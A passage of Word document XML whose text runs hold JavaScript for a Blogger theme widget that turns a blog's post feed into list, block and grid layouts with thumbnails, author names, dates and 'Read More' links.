        <w:t xml:space="preserve">                    if(e.feed.link[k].rel == "alternate"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var lu = e.feed.link[k].href + '?max-results=' + perpage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var c = '&lt;div class="melesa-plugin-link"&gt;&lt;a href="'+lu+'" name="See all intresting post about '+ lbl +'"&gt;See All &lt;i class="ion-chevron-right"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="melesa-plugin melesa-wrap ' +  typ +'"&gt;&lt;div class="row melesa-relative"&gt;&lt;div class="melesa-loading"&gt;&lt;div class="melesa-table"&gt;&lt;div class="melesa-cell"&gt;&lt;div class="cssload-thecube"&gt;&lt;div class="cssload-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cube cssload-c1"&gt;&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div class="cssload-cube cssload-c2"&gt;&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div class="cssload-cube cssload-c4"&gt;&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div class="cssload-cube cssload-c3"&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;h3&gt;Loading..&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  //levels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var totalpost  = e.feed.openSearch$totalResults.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var postcount = e.feed.openSearch$itemsPerPage.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var startindex = e.feed.openSearch$startIndex.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var levels = Math.ceil(totalpost/postcount);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760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  for(var i=0;i&lt;e.feed.entry.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    //grab details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var p = e.feed.entry[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var title = p.title.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    if(p.media$thumbnail){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var pi = p.media$thumbnail.url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      //check for the location for thumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(pi.indexOf('/s72-c') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        pi = pi.replace('/s72-c','/s1600');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(pi.indexOf('img.youtube.com') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        pi = pi.replace('/default.jpg','/maxresdefault.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }else{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var pi = 'https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }//pi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    for(var xc=0;xc&lt;p.link.length;xc++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(p.link[xc].rel == 'alternate'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var pu = p.link[xc].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if((p.link[xc].rel == 'replies') &amp;&amp; (p.link[xc].type == 'text/html') ){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var cmt = p.link[xc].title;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }//pu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var pa = p.author[0].name.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var pau = p.author[0].uri.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var time = p.published.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var snipt =  snip(p.content.$t,25);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    switch(typ){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      case "list-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        if(ct &lt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          c = c + '&lt;div class="col-sm-12 col-xl-6 first"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img alt="'+title+'" src="'+ pi +'"&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm6--&gt;&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="row in"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          c = c + '&lt;div class="col-sm-12"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //[END LIST WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      case "block-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        switch(ct){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12 first"&gt;&lt;div class="row"&gt;&lt;div class="col-sm-12"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img alt="'+title+'" src="'+ pi +'"&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c= c + '&lt;div class="row"&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c= c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                          case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;&lt;/div&gt;&lt;!--/div--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c= c + '&lt;div class="row"&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c= c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;&lt;/div&gt;&lt;!--/div--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }//switch ct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //[END BLOCK WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      case "grid-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        switch(ct){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12 first"&gt;&lt;div class="row"&gt;&lt;div class="col-sm-12 col-xl-6"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="kit-img" alt="'+title+'" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
